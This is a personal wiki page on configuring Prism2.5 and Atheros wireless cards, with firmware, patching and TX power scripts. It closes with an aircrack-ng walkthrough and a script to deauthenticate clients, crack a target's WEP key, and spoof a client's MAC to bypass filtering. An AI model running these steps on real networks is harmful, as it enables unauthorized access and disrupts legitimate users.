Wireless

From Ggl's wiki

Some well-supported 802.11 chipsets

Prism2.5
802.11b only. Linux: wlan-ng or hostap (preferred) drivers, both in the mainline kernel. For packet injection, hostap in kernel versions >= 2.6.16 has to be patched with hostap-kernel-2.6.16.patch, and the Prism station firmware has to be upgraded to at least v1.5.6.
PrismGT
802.11b/g. Linux: prism54 driver (patching recommended for packet injection).
Atheros
802.11a/b/g. Linux: madwifi-ng driver (has to be patched for packet injection).
Ralink
802.11b/g. Linux: rt2x00/rt2500 drivers (no patching required).

note: check the aircrack-ng compatibility and drivers page for details. Driver installation is explained on the aircrack-ng install drivers page.

I have three different chipsets in three PCMCIA cards:

I'll primarily focus on the Senao card.

Configuring and using the cards

Senao Long range NL-2511CD PLUS EXT2

Plugging the antenna

Hold the card with the green LED on top and the PCMCIA connector on the right. The primary jack is the bottom one and the auxiliary/secondary jack is the top one, so plug your antenna into the primary jack. If you have a second antenna, plug it into the secondary jack.

Improving Signal reception or transmission

See Senao NL-2511 on Townsville Wireless and Senao Card on Seattle Wireless. The chipset is a Prism2.5; to inject packets, the hostap drivers need to be patched.

To adjust TX power use the following commands:

iwpriv wlan0 alc 0
iwpriv wlan0 writemif 62 $VALUE

From townsville wireless Senao NL-2511 page:

"$VALUE is a signed integer between -127 and +127, however in the decimal layout that iwpriv uses, the numbers can look a little weird. Essentially, 127 means your power level is off, 0/255 is half-way, with 128 being full power. See the below ASCII art for more detail.

0%---------------50%---------------100%

127-------------0/255---------------128

It should be warned that more power is not always best, as some radios will "bleed" noise into the signal, not only making your SNR stay the same, but then also drowning quieter clients (who perhaps are NOT the 200mW clients). This will reduce their efficiency, and it is possible to prevent someone's association requests from being heard by the servicing AP.

Also, as this is a hack that changes chipset registers, there are some flaws, one being that the power level (checked by "iwpriv <IF> readmif 62") stays at a set level (Around 240 IME for the Senao 200mW Prism2.5 PCMCIA Cards). This will therefore not increase the chance of establishing a link, will only enhance a link already established.

It should also be noticed, this setting seems to take effect for a very short time. The cure for this is to create a script and execute it as a cron job every 1-5 minutes."

So, within the limits described above, lower TX power can mean better effective sensitivity: less of the card's own noise bleeds into the received signal.

To get the best sensitivity, set a lower rate on the wlan0 interface:

$ iwconfig wlan0 rate 1M

At 1 Mb/s the receive sensitivity is -95 dBm (higher rates need a stronger signal, so sensitivity gets worse as the rate goes up).
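The cron-job workaround quoted above, written out as an added example (this script is not from the original page, Townsville Wireless or the hostap project). It turns a percentage into the byte for MIF register 62 and applies it with the iwpriv commands shown above. The percentage-to-register formula is my reading of the ASCII-art mapping (127 = off, 0/255 = half, 128 = full) and is an assumption; the interface name and function names are the script's own.

```sh
#!/bin/sh
# Added example (not from the page or from Townsville Wireless): apply the
# Prism2.5 TX power hack from a percentage and keep re-applying it from cron.
# Register layout assumed from the ASCII art above: walking 0% -> 100% the
# byte written to MIF register 62 runs 127,126,...,0,255,254,...,128.
IFACE="${IFACE:-wlan0}"

# txpower_reg PCT: print the byte for MIF register 62 (0 = off, 100 = full).
txpower_reg() {
    pct=$1
    [ "$pct" -ge 0 ] 2>/dev/null && [ "$pct" -le 100 ] || return 1
    step=$(( (pct * 255 + 50) / 100 ))      # 0..255, rounded
    echo $(( (127 - step + 256) % 256 ))    # (127 - step) mod 256
}

# apply_txpower PCT: disable automatic level control, write the register
# and read it back (the readback is reported to stick near 240 anyway).
apply_txpower() {
    val=$(txpower_reg "$1") || { echo "bad percentage: $1" >&2; return 1; }
    iwpriv "$IFACE" alc 0
    iwpriv "$IFACE" writemif 62 "$val"
    iwpriv "$IFACE" readmif 62
}

# Only touch the card when a percentage is given on the command line, e.g.
# from a crontab entry such as:  */5 * * * * /usr/local/sbin/txpower.sh 100
if [ $# -gt 0 ]; then
    apply_txpower "$1"
fi
```

Run it as root with the wanted percentage as the only argument; the crontab line in the comment re-applies full power every five minutes, which is the 1-5 minute interval the quote recommends.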

Flashing the firmware

Use the following command to see which firmware version is loaded:

$ hostap_diag wlan0

NICID: id=0x8013 v1.0.0 (PRISM II (2.5) Mini-PCI (SST parallel flash))
PRIID: id=0x0015 v1.1.0
STAID: id=0x001f v1.4.9 (station firmware) 

It is better to update the firmware; Netgate's Prism support page provides the firmware files.

I took the latest firmware tarball. As explained by Jun Sun, you can upgrade both the primary and the secondary (also called station) firmware. After unpacking the tarball you will have several directories. To load the new firmware into volatile memory (RAM), use:

$ prism2_srec -r wlan0 <primary> <secondary>

The new firmware stays loaded until power off.

note: on a Debian kernel (2.6.16 for example) CONFIG_HOSTAP_FIRMWARE_NVRAM is not set to 'y' by default, so you have to recompile the hostap modules (hostap and hostap_cs) with CONFIG_HOSTAP_FIRMWARE_NVRAM=y to be able to upgrade the non-volatile firmware.

To write it to non-volatile memory (flash/NVRAM), use:

$ prism2_srec -f wlan0 <primary> <secondary>

The new firmware survives power off.

Test the compatibility of the firmware files first (without -r or -f, prism2_srec only verifies and writes nothing):

$ cd Latest-prism
$ prism2_srec wlan0 primary-FLASH/pf010101.hex secondary-FLASH/su010804.hex
srec summary for pf010101.hex
Component: 0x0015 1.1.1 (primary firmware)

srec summary for su010804.hex
Component: 0x001f 1.8.4 (station firmware)


Verifying update compatibility and combining data:
NICID was not found from the list of supported platforms.
Incompatible update data.

These firmware files are not compatible with the card (the NICID is not in their supported-platform list). Try the other files until you get "OK." for both the primary and the secondary firmware:

$ prism2_srec wlan0 primary-FLASH/pk010101.hex secondary-FLASH/sf010804.hex
srec summary for pk010101.hex
Component: 0x0015 1.1.1 (primary firmware)

srec summary for sf010804.hex
Component: 0x001f 1.8.4 (station firmware)
Verifying update compatibility and combining data:
Plug record length mismatch (PDR=0x0001): 12 != 16
==> extend from default
PRI: old iface 1:4-4 new iface 1:4-4
Could not find data position for plugging PDR 0x0413 at 0x0000118a (len=2)
PDR 0x0413 is not in wlan card PDA and there is no default data. Ignoring plug record.
Allowing S3 overlap due to CRC-16 signature at 0x007e17fe (was: ffff)
OK.

Those are the right ones. Now use the -f switch to actually write the firmware:

$ prism2_srec -f wlan0 primary-FLASH/pk010101.hex secondary-FLASH/sf010804.hex
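The verify-then-flash procedure above, as an added example (this script is not from the page or the hostap project). It reads the station firmware version out of hostap_diag, compares it with the 1.5.6 injection minimum named in the chipset list, dry-runs prism2_srec and only writes the image when the report ends in "OK.". The command syntax is the page's; the helper names and the interface variable are the script's own.

```sh
#!/bin/sh
# Added example (not from the page or the hostap project): check the loaded
# station firmware, dry-run prism2_srec and flash only on an "OK." report.
IFACE="${IFACE:-wlan0}"

# staid_version: read hostap_diag output on stdin, print the STAID version
# (e.g. "1.4.9" from "STAID: id=0x001f v1.4.9 (station firmware)").
staid_version() {
    sed -n 's/^STAID:.* v\([0-9][0-9.]*\) .*/\1/p'
}

# version_ge A B: succeed if dotted version A >= B, compared numerically
# component by component (so 1.10.0 > 1.9.9).
version_ge() {
    a=$1; b=$2
    while [ -n "$a" ] || [ -n "$b" ]; do
        x=${a%%.*}; y=${b%%.*}
        [ "${x:-0}" -gt "${y:-0}" ] && return 0
        [ "${x:-0}" -lt "${y:-0}" ] && return 1
        case $a in *.*) a=${a#*.} ;; *) a= ;; esac
        case $b in *.*) b=${b#*.} ;; *) b= ;; esac
    done
    return 0
}

# srec_ok: read a prism2_srec verification report on stdin; succeed only if
# it contains the final "OK." line (an incompatible image never prints it,
# it says "Incompatible update data." instead).
srec_ok() {
    grep -q '^OK\.$'
}

# flash_firmware PRIMARY.hex SECONDARY.hex [-r|-f]: -r loads into RAM (lost
# at power off, the default here), -f writes flash and needs a hostap module
# built with CONFIG_HOSTAP_FIRMWARE_NVRAM=y.
flash_firmware() {
    pri=$1; sec=$2; mode=${3:--r}
    cur=$(hostap_diag "$IFACE" | staid_version)
    if version_ge "${cur:-0}" 1.5.6; then
        echo "station firmware ${cur} already meets the 1.5.6 injection minimum"
    else
        echo "station firmware ${cur:-unknown} is below 1.5.6, upgrading"
    fi
    if ! prism2_srec "$IFACE" "$pri" "$sec" | srec_ok; then
        echo "$pri + $sec: NICID not supported, refusing to flash" >&2
        return 1
    fi
    prism2_srec "$mode" "$IFACE" "$pri" "$sec"
}

# Usage: ./flash.sh primary-FLASH/pk010101.hex secondary-FLASH/sf010804.hex -f
if [ $# -ge 2 ]; then
    flash_firmware "$@"
fi
```

Load into RAM first (the default), confirm the card still works and injects, and only then repeat with -f; a bad flash write on these cards is not recoverable from the driver.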

Patching hostap drivers

Get enough privileges to patch the files in /usr/src/linux-`uname -r`/drivers/net/wireless/hostap/ (become root, for example). First check that the patch applies cleanly:

$ cd /usr/src/linux-`uname -r`/drivers/net/wireless/
$ patch --dry-run -p0 < /usr/local/files/wireless/aircrack-ng-0.6/hostap-kernel-2.6.16.patch

If you get no error, apply the patch for real (the same command without --dry-run):

$ patch -p0 < /usr/local/files/wireless/aircrack-ng-0.6/hostap-kernel-2.6.16.patch

aircrack-ng tools

Set card into monitor mode and start airodump-ng to collect IVs

When all is done, it's time to play with the aircrack-ng tools. Their wiki is worth a look.

To use aireplay-ng and airodump-ng, put the wireless interface into monitor mode. With an Atheros chipset:

$ airmon-ng start wifi0

Then use the ath1 virtual interface it creates. Start airodump-ng:

$ airodump-ng ath1

Get the ESSID and a client ARP request

To get the ESSID and an ARP request from a client, deauthenticate the client once with aireplay-ng; when it re-associates, the probe/association exchange reveals the ESSID and it usually sends an ARP request:

$ aireplay-ng --deauth 1 -a <bssid> -c <client_mac_addr> ath1

Replay the capture ARP request

Now replay the captured ARP request at a high rate:

$ aireplay-ng -2 -r <capture_file> -x 1000 ath1

capture_file is usually named replay_arp-<month><day>-<number>.cap

Crack the WEP key

You can start aircrack-ng on the .ivs file while airodump-ng is still populating it (-n 128 assumes a 128-bit key; try -n 64 if that fails):

$ aircrack-ng -n 128 <ivs_file>

Bypass MAC filtering and associate yourself to the AP

Now that you have the WEP key you can associate with the target AP. Many personal APs (most DSL wireless modem/routers, in fact) have MAC filtering enabled, so just change the MAC address of your card to that of an authorized client, like the one whose ARP requests you replayed ;). The usual wireless tools do this (check this memo for the commands).

Prism2.5 card

With Prism2.5 cards it's easy (bring the interface down first; most drivers refuse a new hardware address while it is up):

$ ifconfig wlan0 hw ether 11:22:33:44:55:66

Associate with the target WLAN:

$ iwconfig wlan0 mode managed
$ iwconfig wlan0 essid <target_essid>
$ iwconfig wlan0 key <cracked_wep_key>
$ ifconfig wlan0 up

iwconfig wlan0 should now show the BSSID in the "Access Point" field if your card has successfully associated with the target AP; "Not-Associated" or an all-zero address means it has not.
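The Prism2.5 spoof-and-associate sequence above, as an added example with the two checks a practitioner wants around it (this script is not from the page or from hostap): the MAC is validated before use, and the "Access Point" field is read back from iwconfig to decide whether association actually happened. Note that the 11:22:33:44:55:66 placeholder used on this page has the multicast bit set in its first octet; the validator rejects such addresses because many drivers and APs will not accept them. Function names, the interface variable and the iwconfig sample text are constructed for this example.

```sh
#!/bin/sh
# Added example (not from the page): spoof an authorized client's MAC on a
# Prism2.5/hostap interface, associate with the cracked WEP key and verify
# the association by reading iwconfig's "Access Point" field back.
IFACE="${IFACE:-wlan0}"

# valid_mac MAC: accept only a colon-separated unicast address. A first
# octet with its low bit set (e.g. 11:22:33:44:55:66) is a multicast
# address and is refused.
valid_mac() {
    mac=$1
    echo "$mac" | grep -Eq '^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$' || return 1
    first=$(( 0x${mac%%:*} ))
    [ $(( first & 1 )) -eq 0 ]
}

# associated_bssid: read iwconfig output on stdin; print the BSSID if the
# card is associated, nothing for "Not-Associated" or the all-zero address.
associated_bssid() {
    sed -n 's/.*Access Point: \([0-9A-Fa-f:]\{17\}\).*/\1/p' \
        | sed '/^00:00:00:00:00:00$/d'
}

# join_wlan MAC ESSID WEPKEY: the page's ifconfig/iwconfig sequence, with
# the interface taken down first (most drivers reject "hw ether" while it
# is up) and an association check at the end.
join_wlan() {
    mac=$1; essid=$2; key=$3
    valid_mac "$mac" || { echo "$mac is not a usable unicast MAC" >&2; return 1; }
    ifconfig "$IFACE" down
    ifconfig "$IFACE" hw ether "$mac"
    iwconfig "$IFACE" mode managed
    iwconfig "$IFACE" essid "$essid"
    iwconfig "$IFACE" key "$key"      # hex key as printed by aircrack-ng
    ifconfig "$IFACE" up
    sleep 5                           # give the card time to associate
    bssid=$(iwconfig "$IFACE" | associated_bssid)
    if [ -z "$bssid" ]; then
        echo "not associated with $essid" >&2
        return 1
    fi
    echo "associated with $essid at $bssid as $mac"
}

# Usage: ./join.sh 00:11:22:33:44:55 target_essid 1122334455667788990011223344
if [ $# -eq 3 ]; then
    join_wlan "$1" "$2" "$3"
fi
```

The readback matters more than it looks: with a wrong WEP key some APs still accept the association and only drop the encrypted data frames, so treat "associated" as a necessary check, not proof that the key is right.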

Atheros card

With Atheros cards it's a little more tricky (see ChangeMacAddress for details). Install macchanger (Debian has up-to-date packages):

$ apt-get install macchanger

Destroy the automatically created VAPs, then change the address on the underlying wifi0 device with macchanger:

$ wlanconfig ath0 destroy
$ ifconfig wifi0 down hw ether 11:22:33:44:55:66
$ macchanger --mac=11:22:33:44:55:66 wifi0

Check:

$ macchanger --show wifi0